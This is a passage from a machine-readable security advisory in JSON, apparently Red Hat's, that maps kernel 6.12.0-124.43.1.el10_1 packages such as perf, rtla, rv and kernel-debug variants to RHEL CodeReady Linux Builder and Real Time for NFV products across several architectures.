"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.src as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.src",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
